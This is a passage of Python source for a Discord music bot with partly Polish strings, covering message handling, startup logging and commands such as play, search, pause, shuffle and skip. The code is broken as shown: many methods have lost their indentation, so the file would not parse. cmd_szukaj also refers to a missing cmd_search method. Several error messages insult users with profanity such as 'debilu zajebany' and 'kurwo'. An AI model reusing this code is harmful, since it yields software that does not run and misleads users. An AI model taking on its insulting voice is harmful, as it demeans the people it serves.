        except discord.HTTPException:
            # Oversized content is the common cause; anything else is logged raw.
            if len(content) > DISCORD_MSG_CHAR_LIMIT:
                lfunc("WIADOMOŚĆ JEST ZA DUŻA(%s)", DISCORD_MSG_CHAR_LIMIT)
            else:
                lfunc("Błąd w trakcie wysyłania wiadomośći")
                log.noise("Got HTTPException trying to send message to %s: %s", dest, content)
        finally:
            # Schedule deletion timers whether or not sending succeeded.
            if msg and expire_in:
                asyncio.ensure_future(self._wait_delete_msg(msg, expire_in))
            if also_delete and isinstance(also_delete, discord.Message):
                asyncio.ensure_future(self._wait_delete_msg(also_delete, expire_in))
        return msg
async def safe_delete_message(self, message, *, quiet=False):
lfunc = log.debug if quiet else log.warning
try:
return await self.delete_message(message)
except discord.Forbidden:
lfunc("Cannot delete message \"{}\", no permission".format(message.clean_content))
except discord.NotFound:
lfunc("Cannot delete message \"{}\", message not found".format(message.clean_content))
async def safe_edit_message(self, message, new, *, send_if_fail=False, quiet=False):
lfunc = log.debug if quiet else log.warning
try:
return await self.edit_message(message, new)
except discord.NotFound:
lfunc("Cannot edit message \"{}\", message not found".format(message.clean_content))
if send_if_fail:
lfunc("Sending message instead")
return await self.safe_send_message(message.channel, new)
    async def send_typing(self, destination):
        """Show a typing indicator in *destination*, ignoring missing permissions."""
        try:
            return await super().send_typing(destination)
        except discord.Forbidden:
            log.warning("Could not send typing to {}, no permission".format(destination))
    async def edit_profile(self, **fields):
        """Edit the account profile; userbot accounts must supply the password."""
        if self.user.bot:
            return await super().edit_profile(**fields)
        else:
            return await super().edit_profile(self.config._password,**fields)
    async def restart(self):
        """Request a full bot restart: store RestartSignal, then log out.

        The signal is re-raised by run() after cleanup so the launcher can
        restart the process.
        """
        self.exit_signal = exceptions.RestartSignal()
        await self.logout()
    def restart_threadsafe(self):
        """Thread-safe wrapper for restart(); schedules it on the bot's loop."""
        asyncio.run_coroutine_threadsafe(self.restart(), self.loop)
    def _cleanup(self):
        """Best-effort shutdown: log out and cancel all outstanding tasks.

        The bare excepts are deliberate -- cleanup must never raise, even on
        CancelledError bubbling out of the tasks being torn down.
        """
        try:
            self.loop.run_until_complete(self.logout())
        except: pass
        # NOTE(review): asyncio.Task.all_tasks() is deprecated since 3.7 and
        # removed in 3.9; asyncio.all_tasks(loop) is the modern equivalent.
        pending = asyncio.Task.all_tasks()
        gathered = asyncio.gather(*pending)
        try:
            gathered.cancel()
            self.loop.run_until_complete(gathered)
            # Retrieve the exception so it isn't logged as "never retrieved".
            gathered.exception()
        except: pass
    # noinspection PyMethodOverriding
    def run(self):
        """Run the bot until logout, translating login failures into HelpfulError.

        Always runs _cleanup() and closes the loop; re-raises any stored exit
        signal (restart/terminate) afterwards so the launcher can act on it.
        """
        try:
            self.loop.run_until_complete(self.start(*self.config.auth))
        except discord.errors.LoginFailure:
            # Add if token, else
            # The list is indexed by how many credential fields were supplied
            # (1 = token, 2 = email/password); index 0 should be unreachable.
            raise exceptions.HelpfulError(
                "Bot cannot login, bad credentials.",
                "Fix your %s in the options file. "
                "Remember that each field should be on their own line."
                % ['shit', 'Token', 'Email/Password', 'Credentials'][len(self.config.auth)]
            ) # ^^^^ In theory self.config.auth should never have no items
        finally:
            try:
                self._cleanup()
            except Exception:
                log.error("Error in cleanup", exc_info=True)
            self.loop.close()
            if self.exit_signal:
                raise self.exit_signal
    async def logout(self):
        """Disconnect all voice clients before logging out of Discord."""
        await self.disconnect_all_voice_clients()
        return await super().logout()
    async def on_error(self, event, *args, **kwargs):
        """Global event-error hook: shut down on fatal errors, log the rest."""
        ex_type, ex, stack = sys.exc_info()
        if ex_type == exceptions.HelpfulError:
            log.error("Exception in {}:\n{}".format(event, ex.message))
            await asyncio.sleep(2)  # don't ask
            await self.logout()
        elif issubclass(ex_type, exceptions.Signal):
            # Restart/terminate signals: remember which one, then log out so
            # run() can re-raise it after cleanup.
            self.exit_signal = ex_type
            await self.logout()
        else:
            log.error("Exception in {}".format(event), exc_info=True)
    async def on_resumed(self):
        """Called when the gateway session resumes after a disconnect."""
        log.info("\nReconnected to discord.\n")
    async def on_ready(self):
        """Post-login setup: sanity checks, startup logging, channel binding,
        voice autojoin, and the initial presence update.

        May fire more than once per process; init_ok guards against re-running
        setup when a READY arrives after a failed session resume.
        """
        # Remove discord.py's no-newline progress handlers before real logging.
        dlogger = logging.getLogger('discord')
        for h in dlogger.handlers:
            if getattr(h, 'terminator', None) == '':
                dlogger.removeHandler(h)
                print()
        log.debug("Connection established, ready to go.")
        self.ws._keep_alive.name = 'Gateway Keepalive'
        if self.init_ok:
            log.debug("Received additional READY event, may have failed to resume")
            return
        await self._on_ready_sanity_checks()
        print()
        log.info('Connected to Discord!')
        self.init_ok = True
        ################################
        log.info("Bot: {0}/{1}#{2}{3}".format(
            self.user.id,
            self.user.name,
            self.user.discriminator,
            ' [BOT]' if self.user.bot else ' [Userbot]'
        ))
        owner = self._get_owner(voice=True) or self._get_owner()
        if owner and self.servers:
            log.info("Owner: {0}/{1}#{2}\n".format(
                owner.id,
                owner.name,
                owner.discriminator
            ))
            log.info('Server List:')
            [log.info(' - ' + s.name) for s in self.servers]
        elif self.servers:
            log.warning("Owner could not be found on any server (id: %s)\n" % self.config.owner_id)
            log.info('Server List:')
            [log.info(' - ' + s.name) for s in self.servers]
        else:
            log.warning("Owner unknown, bot is not on any servers.")
            if self.user.bot:
                log.warning(
                    "To make the bot join a server, paste this link in your browser. \n"
                    "Note: You should be logged into your main account and have \n"
                    "manage server permissions on the server you want the bot to join.\n"
                    " " + await self.generate_invite_link()
                )
        print(flush=True)
        # Resolve configured bound text channels; voice channels are invalid here.
        if self.config.bound_channels:
            chlist = set(self.get_channel(i) for i in self.config.bound_channels if i)
            chlist.discard(None)
            invalids = set()
            invalids.update(c for c in chlist if c.type == discord.ChannelType.voice)
            chlist.difference_update(invalids)
            self.config.bound_channels.difference_update(invalids)
            if chlist:
                log.info("Bound to text channels:")
                [log.info(' - {}/{}'.format(ch.server.name.strip(), ch.name.strip())) for ch in chlist if ch]
            else:
                print("Not bound to any text channels")
            if invalids and self.config.debug_mode:
                print(flush=True)
                log.info("Not binding to voice channels:")
                [log.info(' - {}/{}'.format(ch.server.name.strip(), ch.name.strip())) for ch in invalids if ch]
            print(flush=True)
        else:
            log.info("Not bound to any text channels")
        # Resolve configured autojoin voice channels; text channels are invalid here.
        if self.config.autojoin_channels:
            chlist = set(self.get_channel(i) for i in self.config.autojoin_channels if i)
            chlist.discard(None)
            invalids = set()
            invalids.update(c for c in chlist if c.type == discord.ChannelType.text)
            chlist.difference_update(invalids)
            self.config.autojoin_channels.difference_update(invalids)
            if chlist:
                log.info("Autojoining voice chanels:")
                [log.info(' - {}/{}'.format(ch.server.name.strip(), ch.name.strip())) for ch in chlist if ch]
            else:
                log.info("Not autojoining any voice channels")
            if invalids and self.config.debug_mode:
                print(flush=True)
                log.info("Cannot autojoin text channels:")
                [log.info(' - {}/{}'.format(ch.server.name.strip(), ch.name.strip())) for ch in invalids if ch]
            autojoin_channels = chlist
        else:
            log.info("Not autojoining any voice channels")
            autojoin_channels = set()
        print(flush=True)
        log.info("Options:")
        log.info(" Command prefix: " + self.config.command_prefix)
        log.info(" Default volume: {}%".format(int(self.config.default_volume * 100)))
        log.info(" Skip threshold: {} votes or {}%".format(
            self.config.skips_required, fixg(self.config.skip_ratio_required * 100)))
        log.info(" Now Playing @mentions: " + ['Disabled', 'Enabled'][self.config.now_playing_mentions])
        log.info(" Auto-Summon: " + ['Disabled', 'Enabled'][self.config.auto_summon])
        log.info(" Auto-Playlist: " + ['Disabled', 'Enabled'][self.config.auto_playlist])
        log.info(" Auto-Pause: " + ['Disabled', 'Enabled'][self.config.auto_pause])
        log.info(" Delete Messages: " + ['Disabled', 'Enabled'][self.config.delete_messages])
        if self.config.delete_messages:
            log.info(" Delete Invoking: " + ['Disabled', 'Enabled'][self.config.delete_invoking])
        log.info(" Debug Mode: " + ['Disabled', 'Enabled'][self.config.debug_mode])
        log.info(" Downloaded songs will be " + ['deleted', 'saved'][self.config.save_videos])
        if self.config.status_message:
            log.info(" Status message: " + self.config.status_message)
        print(flush=True)
        await self.update_now_playing_status()
        # maybe option to leave the ownerid blank and generate a random command for the owner to use
        # wait_for_message is pretty neato
        await self._join_startup_channels(autojoin_channels, autosummon=self.config.auto_summon)
        # t-t-th-th-that's all folks!
async def cmd_help(self, command=None):
"""
Usage:
{command_prefix}help [command]
Prints a help message.
If a command is specified, it prints a help message for that command.
Otherwise, it lists the available commands.
"""
if command:
cmd = getattr(self, 'cmd_' + command, None)
if cmd and not hasattr(cmd, 'dev_cmd'):
return Response(
"```\n{}```".format(
dedent(cmd.__doc__)
).format(command_prefix=self.config.command_prefix),
delete_after=60
)
else:
return Response("Nie ma takiej komendy", delete_after=10)
else:
helpmsg = "**Dostępne Komendy**\n```"
commands = []
for att in dir(self):
if att.startswith('cmd_') and att != 'cmd_help' and not hasattr(getattr(self, att), 'dev_cmd'):
command_name = att.replace('cmd_', '').lower()
commands.append("{}{}".format(self.config.command_prefix, command_name))
helpmsg += ", ".join(commands)
helpmsg += "```\n<>"
helpmsg += "Możesz też uzyc `{}help x` aby dowiedzieć paru rzeczy się o poszczególnych komendach.".format(self.config.command_prefix)
return Response(helpmsg, reply=True, delete_after=60)
async def cmd_blacklist(self, message, user_mentions, option, something):
"""
Usage:
{command_prefix}blacklist [ + | - | add | remove ] @UserName [@UserName2 ...]
Add or remove users to the blacklist.
Blacklisted users are forbidden from using bot commands.
"""
if not user_mentions:
raise exceptions.CommandError("No users listed.", expire_in=20)
if option not in ['+', '-', 'add', 'remove']:
raise exceptions.CommandError(
'Invalid option "%s" specified, use +, -, add, or remove' % option, expire_in=20
)
for user in user_mentions.copy():
if user.id == self.config.owner_id:
print("[Commands:Blacklist] The owner cannot be blacklisted.")
user_mentions.remove(user)
old_len = len(self.blacklist)
if option in ['+', 'add']:
self.blacklist.update(user.id for user in user_mentions)
write_file(self.config.blacklist_file, self.blacklist)
return Response(
'%s users have been added to the blacklist' % (len(self.blacklist) - old_len),
reply=True, delete_after=10
)
else:
if self.blacklist.isdisjoint(user.id for user in user_mentions):
return Response('none of those users are in the blacklist.', reply=True, delete_after=10)
else:
self.blacklist.difference_update(user.id for user in user_mentions)
write_file(self.config.blacklist_file, self.blacklist)
return Response(
'%s users have been removed from the blacklist' % (old_len - len(self.blacklist)),
reply=True, delete_after=10
)
async def cmd_id(self, author, user_mentions):
"""
Usage:
{command_prefix}id [@user]
Tells the user their id or the id of another user.
"""
if not user_mentions:
return Response('your id is `%s`' % author.id, reply=True, delete_after=35)
else:
usr = user_mentions[0]
return Response("%s's id is `%s`" % (usr.name, usr.id), reply=True, delete_after=35)
async def cmd_save(self, player):
"""
Usage:
{command_prefix}save
Saves the current song to the autoplaylist.
"""
if player.current_entry and not isinstance(player.current_entry, StreamPlaylistEntry):
url = player.current_entry.url
if url not in self.autoplaylist:
self.autoplaylist.append(url)
write_file(self.config.auto_playlist_file, self.autoplaylist)
log.debug("Appended {} to autoplaylist".format(url))
return Response('\N{THUMBS UP SIGN}')
else:
raise exceptions.CommandError('Już jest w autoplayliscie.')
else:
raise exceptions.CommandError('There is no valid song playing.')
    @owner_only
    async def cmd_wejdz(self, message, server_link=None):
        """
        Usage:
            {command_prefix}wejdz invite_link
        Asks the bot to join a server. Note: Bot accounts cannot use invite links.
        """
        # Bot accounts can only be added via an OAuth invite URL.
        if self.user.bot:
            url = await self.generate_invite_link()
            return Response(
                "Kliknij by dodać mnie na serwer.: \n{}".format(url),
                reply=True, delete_after=30
            )
        try:
            if server_link:
                await self.accept_invite(server_link)
                return Response("\N{THUMBS UP SIGN}")
        # Bare except: any accept_invite failure is reported as a bad URL.
        except:
            raise exceptions.CommandError('Invalid URL provided:\n{}\n'.format(server_link), expire_in=30)
    async def cmd_play(self, player, channel, author, permissions, leftover_args, song_url):
        """
        Usage:
            {command_prefix}play song_link
            {command_prefix}play text to search for
        Adds the song to the playlist. If a link is not provided, the first
        result from a youtube search is added to the queue.
        """
        song_url = song_url.strip('<>')
        await self.send_typing(channel)
        if leftover_args:
            # Everything after the first word is part of the song name/url.
            song_url = ' '.join([song_url, *leftover_args])
        linksRegex = '((http(s)*:[/][/]|www.)([a-z]|[A-Z]|[0-9]|[/.]|[~])*)'
        pattern = re.compile(linksRegex)
        matchUrl = pattern.match(song_url)
        if matchUrl is None:
            # Not a URL: escape slashes so the text is treated as a search query.
            song_url = song_url.replace('/', '%2F')
        # One play command at a time per user, to enforce per-user song limits.
        async with self.aiolocks[_func_() + ':' + author.id]:
            if permissions.max_songs and player.playlist.count_for_user(author) >= permissions.max_songs:
                raise exceptions.PermissionsError(
                    "Osiagnales limit requestow debilu zajebany (%s)" % permissions.max_songs, expire_in=30
                )
            try:
                info = await self.downloader.extract_info(player.playlist.loop, song_url, download=False, process=False)
            except Exception as e:
                raise exceptions.CommandError(e, expire_in=30)
            if not info:
                raise exceptions.CommandError(
                    "Nie umiem grac muzyki smuteg. Try using the {}stream command.".format(self.config.command_prefix),
                    expire_in=30
                )
            # abstract the search handling away from the user
            # our ytdl options allow us to use search strings as input urls
            if info.get('url', '').startswith('ytsearch'):
                # print("[Command:play] Searching for \"%s\"" % song_url)
                info = await self.downloader.extract_info(
                    player.playlist.loop,
                    song_url,
                    download=False,
                    process=True,    # ASYNC LAMBDAS WHEN
                    on_error=lambda e: asyncio.ensure_future(
                        self.safe_send_message(channel, "```\n%s\n```" % e, expire_in=120), loop=self.loop),
                    retry_on_error=True
                )
                if not info:
                    raise exceptions.CommandError(
                        "No cusz,zjebalo sie. "
                        "Restartuj bota kurwo.", expire_in=30
                    )
                if not all(info.get('entries', [])):
                    # empty list, no data
                    log.debug("Got empty list, no data")
                    return
                # TODO: handle 'webpage_url' being 'ytsearch:...' or extractor type
                # Re-extract using the first search result's real URL.
                song_url = info['entries'][0]['webpage_url']
                info = await self.downloader.extract_info(player.playlist.loop, song_url, download=False, process=False)
                # Now I could just do: return await self.cmd_play(player, channel, author, song_url)
                # But this is probably fine
            # TODO: Possibly add another check here to see about things like the bandcamp issue
            # TODO: Where ytdl gets the generic extractor version with no processing, but finds two different urls
            if 'entries' in info:
                # Playlist (or multi-result) branch.
                # I have to do exe extra checks anyways because you can request an arbitrary number of search results
                if not permissions.allow_playlists and ':search' in info['extractor'] and len(info['entries']) > 1:
                    raise exceptions.PermissionsError("You are not allowed to request playlists", expire_in=30)
                # The only reason we would use this over `len(info['entries'])` is if we add `if _` to this one
                num_songs = sum(1 for _ in info['entries'])
                if permissions.max_playlist_length and num_songs > permissions.max_playlist_length:
                    raise exceptions.PermissionsError(
                        "Playlist has too many entries (%s > %s)" % (num_songs, permissions.max_playlist_length),
                        expire_in=30
                    )
                # This is a little bit weird when it says (x + 0 > y), I might add the other check back in
                if permissions.max_songs and player.playlist.count_for_user(author) + num_songs > permissions.max_songs:
                    raise exceptions.PermissionsError(
                        "Playlist entries + your already queued songs reached limit (%s + %s > %s)" % (
                            num_songs, player.playlist.count_for_user(author), permissions.max_songs),
                        expire_in=30
                    )
                # These extractors get the dedicated non-blocking async handler.
                if info['extractor'].lower() in ['youtube:playlist', 'soundcloud:set', 'bandcamp:album']:
                    try:
                        return await self._cmd_play_playlist_async(player, channel, author, permissions, song_url, info['extractor'])
                    except exceptions.CommandError:
                        raise
                    except Exception as e:
                        log.error("Error queuing playlist", exc_info=True)
                        raise exceptions.CommandError("Error queuing playlist:\n%s" % e, expire_in=30)
                t0 = time.time()
                # My test was 1.2 seconds per song, but we maybe should fudge it a bit, unless we can
                # monitor it and edit the message with the estimated time, but that's some ADVANCED SHIT
                # I don't think we can hook into it anyways, so this will have to do.
                # It would probably be a thread to check a few playlists and get the speed from that
                # Different playlists might download at different speeds though
                wait_per_song = 1.2
                procmesg = await self.safe_send_message(
                    channel,
                    'Gathering playlist information for {} songs{}'.format(
                        num_songs,
                        ', ETA: {} seconds'.format(fixg(
                            num_songs * wait_per_song)) if num_songs >= 10 else '.'))
                # We don't have a pretty way of doing this yet. We need either a loop
                # that sends these every 10 seconds or a nice context manager.
                await self.send_typing(channel)
                # TODO: I can create an event emitter object instead, add event functions, and every play list might be asyncified
                # Also have a "verify_entry" hook with the entry as an arg and returns the entry if its ok
                entry_list, position = await player.playlist.import_from(song_url, channel=channel, author=author)
                tnow = time.time()
                ttime = tnow - t0
                listlen = len(entry_list)
                drop_count = 0
                # Enforce the per-song duration limit over the whole import.
                if permissions.max_song_length:
                    for e in entry_list.copy():
                        if e.duration > permissions.max_song_length:
                            player.playlist.entries.remove(e)
                            entry_list.remove(e)
                            drop_count += 1
                            # Im pretty sure there's no situation where this would ever break
                            # Unless the first entry starts being played, which would make this a race condition
                    if drop_count:
                        print("Dropped %s songs" % drop_count)
                log.info("Processed {} songs in {} seconds at {:.2f}s/song, {:+.2g}/song from expected ({}s)".format(
                    listlen,
                    fixg(ttime),
                    ttime / listlen if listlen else 0,
                    ttime / listlen - wait_per_song if listlen - wait_per_song else 0,
                    fixg(wait_per_song * num_songs))
                )
                await self.safe_delete_message(procmesg)
                if not listlen - drop_count:
                    raise exceptions.CommandError(
                        "No songs were added, all songs were over max duration (%ss)" % permissions.max_song_length,
                        expire_in=30
                    )
                reply_text = "Enqueued **%s** songs to be played. Position in queue: %s"
                btext = str(listlen - drop_count)
            else:
                # Single-entry branch.
                if permissions.max_song_length and info.get('duration', 0) > permissions.max_song_length:
                    raise exceptions.PermissionsError(
                        "Song duration exceeds limit (%s > %s)" % (info['duration'], permissions.max_song_length),
                        expire_in=30
                    )
                try:
                    entry, position = await player.playlist.add_entry(song_url, channel=channel, author=author)
                except exceptions.WrongEntryTypeError as e:
                    # ytdl decided this was actually a playlist; retry with its url.
                    if e.use_url == song_url:
                        log.warning("Determined incorrect entry type, but suggested url is the same. Help.")
                    log.debug("Assumed url \"%s\" was a single entry, was actually a playlist" % song_url)
                    log.debug("Using \"%s\" instead" % e.use_url)
                    return await self.cmd_play(player, channel, author, permissions, leftover_args, e.use_url)
                reply_text = "Enqueued **%s** to be played. Position in queue: %s"
                btext = entry.title
            if position == 1 and player.is_stopped:
                position = 'Up next!'
                reply_text %= (btext, position)
            else:
                try:
                    time_until = await player.playlist.estimate_time_until(position, player)
                    reply_text += ' - estimated time until playing: %s'
                except:
                    traceback.print_exc()
                    time_until = ''
                reply_text %= (btext, position, ftimedelta(time_until))
            return Response(reply_text, delete_after=30)
async def _cmd_play_playlist_async(self, player, channel, author, permissions, playlist_url, extractor_type):
"""
Secret handler to use the async wizardry to make playlist queuing non-"blocking"
"""
await self.send_typing(channel)
info = await self.downloader.extract_info(player.playlist.loop, playlist_url, download=False, process=False)
if not info:
raise exceptions.CommandError("That playlist cannot be played.")
num_songs = sum(1 for _ in info['entries'])
t0 = time.time()
busymsg = await self.safe_send_message(
channel, "Processing %s songs..." % num_songs) # TODO: From playlist_title
await self.send_typing(channel)
entries_added = 0
if extractor_type == 'youtube:playlist':
try:
entries_added = await player.playlist.async_process_youtube_playlist(
playlist_url, channel=channel, author=author)
# TODO: Add hook to be called after each song
# TODO: Add permissions
except Exception:
log.error("Error processing playlist", exc_info=True)
raise exceptions.CommandError('Error handling playlist %s queuing.' % playlist_url, expire_in=30)
elif extractor_type.lower() in ['soundcloud:set', 'bandcamp:album']:
try:
entries_added = await player.playlist.async_process_sc_bc_playlist(
playlist_url, channel=channel, author=author)
# TODO: Add hook to be called after each song
# TODO: Add permissions
except Exception:
log.error("Error processing playlist", exc_info=True)
raise exceptions.CommandError('Error handling playlist %s queuing.' % playlist_url, expire_in=30)
songs_processed = len(entries_added)
drop_count = 0
skipped = False
if permissions.max_song_length:
for e in entries_added.copy():
if e.duration > permissions.max_song_length:
try:
player.playlist.entries.remove(e)
entries_added.remove(e)
drop_count += 1
except:
pass
if drop_count:
log.debug("Dropped %s songs" % drop_count)
if player.current_entry and player.current_entry.duration > permissions.max_song_length:
await self.safe_delete_message(self.server_specific_data[channel.server]['last_np_msg'])
self.server_specific_data[channel.server]['last_np_msg'] = None
skipped = True
player.skip()
entries_added.pop()
await self.safe_delete_message(busymsg)
songs_added = len(entries_added)
tnow = time.time()
ttime = tnow - t0
wait_per_song = 1.2
# TODO: actually calculate wait per song in the process function and return that too
# This is technically inaccurate since bad songs are ignored but still take up time
log.info("Processed {}/{} songs in {} seconds at {:.2f}s/song, {:+.2g}/song from expected ({}s)".format(
songs_processed,
num_songs,
fixg(ttime),
ttime / num_songs if num_songs else 0,
ttime / num_songs - wait_per_song if num_songs - wait_per_song else 0,
fixg(wait_per_song * num_songs))
)
if not songs_added:
basetext = "No songs were added, all songs were over max duration (%ss)" % permissions.max_song_length
if skipped:
basetext += "\nAdditionally, the current song was skipped for being too long."
raise exceptions.CommandError(basetext, expire_in=30)
return Response("Enqueued {} songs to be played in {} seconds".format(
songs_added, fixg(ttime, 1)), delete_after=30)
async def cmd_stream(self, player, channel, author, permissions, song_url):
"""
Usage:
{command_prefix}stream song_link
Enqueue a media stream.
This could mean an actual stream like Twitch or shoutcast, or simply streaming
media without predownloading it. Note: FFmpeg is notoriously bad at handling
streams, especially on poor connections. You have been warned.
"""
song_url = song_url.strip('<>')
if permissions.max_songs and player.playlist.count_for_user(author) >= permissions.max_songs:
raise exceptions.PermissionsError(
"You have reached your enqueued song limit (%s)" % permissions.max_songs, expire_in=30
)
await self.send_typing(channel)
await player.playlist.add_stream_entry(song_url, channel=channel, author=author)
return Response(":+1:", delete_after=6)
async def cmd_szukaj(self, player, channel, author, permissions, leftover_args):
"""
Usage:
{command_prefix}szukaj [service] [number] query
Searches a service for a video and adds it to the queue.
- service: any one of the following services:
- youtube (yt) (default if unspecified)
- soundcloud (sc)
- yahoo (yh)
- number: return a number of video results and waits for user to choose one
- defaults to 3 if unspecified
- note: If your search query starts with a number,
you must put your query in quotes
- ex: {command_prefix}search 2 "I ran seagulls"
The command issuer can use reactions to indicate their response to each result.
"""
if permissions.max_songs and player.playlist.count_for_user(author) > permissions.max_songs:
raise exceptions.PermissionsError(
"Osiągnąłeś limit playlisty kutasie. (%s)" % permissions.max_songs,
expire_in=30
)
def argcheck():
if not leftover_args:
# noinspection PyUnresolvedReferences
raise exceptions.CommandError(
"Please specify a search query.\n%s" % dedent(
self.cmd_search.__doc__.format(command_prefix=self.config.command_prefix)),
expire_in=60
)
argcheck()
try:
leftover_args = shlex.split(' '.join(leftover_args))
except ValueError:
raise exceptions.CommandError("Please quote your search query properly.", expire_in=30)
service = 'youtube'
items_requested = 3
max_items = 10 # this can be whatever, but since ytdl uses about 1000, a small number might be better
services = {
'youtube': 'ytsearch',
'soundcloud': 'scsearch',
'yahoo': 'yvsearch',
'yt': 'ytsearch',
'sc': 'scsearch',
'yh': 'yvsearch'
}
if leftover_args[0] in services:
service = leftover_args.pop(0)
argcheck()
if leftover_args[0].isdigit():
items_requested = int(leftover_args.pop(0))
argcheck()
if items_requested > max_items:
raise exceptions.CommandError("You cannot search for more than %s videos" % max_items)
# Look jake, if you see this and go "what the fuck are you doing"
# and have a better idea on how to do this, i'd be delighted to know.
# I don't want to just do ' '.join(leftover_args).strip("\"'")
# Because that eats both quotes if they're there
# where I only want to eat the outermost ones
if leftover_args[0][0] in '\'"':
lchar = leftover_args[0][0]
leftover_args[0] = leftover_args[0].lstrip(lchar)
leftover_args[-1] = leftover_args[-1].rstrip(lchar)
search_query = '%s%s:%s' % (services[service], items_requested, ' '.join(leftover_args))
search_msg = await self.send_message(channel, "Searching for videos...")
await self.send_typing(channel)
try:
info = await self.downloader.extract_info(player.playlist.loop, search_query, download=False, process=True)
except Exception as e:
await self.safe_edit_message(search_msg, str(e), send_if_fail=True)
return
else:
await self.safe_delete_message(search_msg)
if not info:
return Response("No videos found.", delete_after=30)
for e in info['entries']:
result_message = await self.safe_send_message(channel, "Result %s/%s: %s" % (
info['entries'].index(e) + 1, len(info['entries']), e['webpage_url']))
reactions = ['\u2705', '\U0001F6AB', '\U0001F3C1']
for r in reactions:
await self.add_reaction(result_message, r)
res = await self.wait_for_reaction(reactions, user=author, timeout=30, message=result_message)
if not res:
await self.safe_delete_message(result_message)
return
if res.reaction.emoji == '\u2705': # check
await self.safe_delete_message(result_message)
await self.cmd_play(player, channel, author, permissions, [], e['webpage_url'])
return Response("Alright, coming right up!", delete_after=30)
elif res.reaction.emoji == '\U0001F6AB': # cross
await self.safe_delete_message(result_message)
continue
else:
await self.safe_delete_message(result_message)
break
return Response("Oh well \N{SLIGHTLY FROWNING FACE}", delete_after=30)
async def cmd_np(self, player, channel, server, message):
    """
    Usage:
        {command_prefix}np
    Displays the current song in chat.
    """
    if player.current_entry:
        # Keep only one now-playing message per server: delete the previous one.
        if self.server_specific_data[server]['last_np_msg']:
            await self.safe_delete_message(self.server_specific_data[server]['last_np_msg'])
            self.server_specific_data[server]['last_np_msg'] = None
        # TODO: Fix timedelta garbage with util function
        song_progress = ftimedelta(timedelta(seconds=player.progress))
        song_total = ftimedelta(timedelta(seconds=player.current_entry.duration))
        # Streams have no meaningful total duration, so show progress only.
        streaming = isinstance(player.current_entry, StreamPlaylistEntry)
        prog_str = ('`[{progress}]`' if streaming else '`[{progress}/{total}]`').format(
            progress=song_progress, total=song_total
        )
        action_text = 'Streaming' if streaming else 'Playing'
        # Credit the requester when the entry carries channel/author metadata.
        if player.current_entry.meta.get('channel', False) and player.current_entry.meta.get('author', False):
            np_text = "Now {action}: **{title}** added by **{author}** {progress}\n\N{WHITE RIGHT POINTING BACKHAND INDEX} <{url}>".format(
                action=action_text,
                title=player.current_entry.title,
                author=player.current_entry.meta['author'].name,
                progress=prog_str,
                url=player.current_entry.url
            )
        else:
            np_text = "Now {action}: **{title}** {progress}\n\N{WHITE RIGHT POINTING BACKHAND INDEX} <{url}>".format(
                action=action_text,
                title=player.current_entry.title,
                progress=prog_str,
                url=player.current_entry.url
            )
        self.server_specific_data[server]['last_np_msg'] = await self.safe_send_message(channel, np_text)
        await self._manual_delete_check(message)
    else:
        return Response(
            'There are no songs queued! Queue something with {}play.'.format(self.config.command_prefix),
            delete_after=30
        )
async def cmd_dj(self, channel, server, author, voice_channel):
    """
    Usage:
        {command_prefix}dj
    Call the bot to the summoner's voice channel.
    """
    # The caller must themselves be in a voice channel for us to join.
    if not author.voice_channel:
        raise exceptions.CommandError('NIE JESTES W KANALE TEKSTOWYM!')
    # Already connected on this server: just move to the caller's channel.
    voice_client = self.voice_client_in(server)
    if voice_client and server == author.voice_channel.server:
        await voice_client.move_to(author.voice_channel)
        return
    # move to _verify_vc_perms?
    chperms = author.voice_channel.permissions_for(server.me)
    if not chperms.connect:
        log.warning("Cannot join channel \"{}\", no permission.".format(author.voice_channel.name))
        return Response(
            "```Cannot join channel \"{}\", no permission.```".format(author.voice_channel.name),
            delete_after=25
        )
    elif not chperms.speak:
        log.warning("Will not join channel \"{}\", no permission to speak.".format(author.voice_channel.name))
        return Response(
            "```Will not join channel \"{}\", no permission to speak.```".format(author.voice_channel.name),
            delete_after=25
        )
    log.info("Joining {0.server.name}/{0.name}".format(author.voice_channel))
    player = await self.get_player(author.voice_channel, create=True, deserialize=self.config.persistent_queue)
    if player.is_stopped:
        player.play()
    # Kick the autoplaylist into gear if it is enabled and nothing is queued.
    if self.config.auto_playlist:
        await self.on_player_finished_playing(player)
async def cmd_pauza(self, player):
    """
    Usage:
        {command_prefix}pauza
    Pauses playback of the current song.
    """
    # Guard clause: there is nothing to pause unless something is playing.
    if not player.is_playing:
        raise exceptions.CommandError('Player is not playing.', expire_in=30)
    player.pause()
async def cmd_odpauzuj(self, player):
    """
    Usage:
        {command_prefix}odpauzuj
    Resumes playback of a paused song.
    """
    # Guard clause: resuming only makes sense while paused.
    if not player.is_paused:
        raise exceptions.CommandError('Player is not paused.', expire_in=30)
    player.resume()
async def cmd_mieszaj(self, channel, player):
    """
    Usage:
        {command_prefix}mieszaj
    Shuffles the playlist.
    """
    # Shuffle the real queue first; the rest is just a card-deal animation.
    player.playlist.shuffle()
    cards = ['\N{BLACK SPADE SUIT}', '\N{BLACK CLUB SUIT}', '\N{BLACK HEART SUIT}', '\N{BLACK DIAMOND SUIT}']
    random.shuffle(cards)
    hand = await self.send_message(channel, ' '.join(cards))
    await asyncio.sleep(0.6)
    # Re-deal the hand a few times so the message visibly "shuffles".
    for _ in range(4):
        random.shuffle(cards)
        await self.safe_edit_message(hand, ' '.join(cards))
        await asyncio.sleep(0.6)
    await self.safe_delete_message(hand, quiet=True)
    return Response("\N{OK HAND SIGN}", delete_after=15)
async def cmd_wyjeb(self, player, author):
    """
    Usage:
        {command_prefix}wyjeb
    Clears the playlist.
    """
    # Drop every queued entry, then acknowledge with the litter emoji.
    player.playlist.clear()
    return Response('\N{PUT LITTER IN ITS PLACE SYMBOL}', delete_after=20)
async def cmd_skip(self, player, channel, author, message, permissions, voice_channel):
    """
    Usage:
        {command_prefix}skip
    Skips the current song when enough votes are cast, or by the bot owner.
    """
    if player.is_stopped:
        raise exceptions.CommandError("Can't skip! The player is not playing!", expire_in=20)
    # No current entry: report on the next queued entry's download state instead.
    if not player.current_entry:
        if player.playlist.peek():
            if player.playlist.peek()._is_downloading:
                return Response("The next song (%s) is downloading, please wait." % player.playlist.peek().title)
            elif player.playlist.peek().is_downloaded:
                print("The next song will be played shortly. Please wait.")
            else:
                print("Something odd is happening. "
                      "You might want to restart the bot if it doesn't start working.")
        else:
            print("Something strange is happening. "
                  "You might want to restart the bot if it doesn't start working.")
    # Owner, users with the instaskip permission, or the song's requester skip instantly.
    if author.id == self.config.owner_id \
            or permissions.instaskip \
            or author == player.current_entry.meta.get('author', None):
        player.skip()  # check autopause stuff here
        await self._manual_delete_check(message)
        return
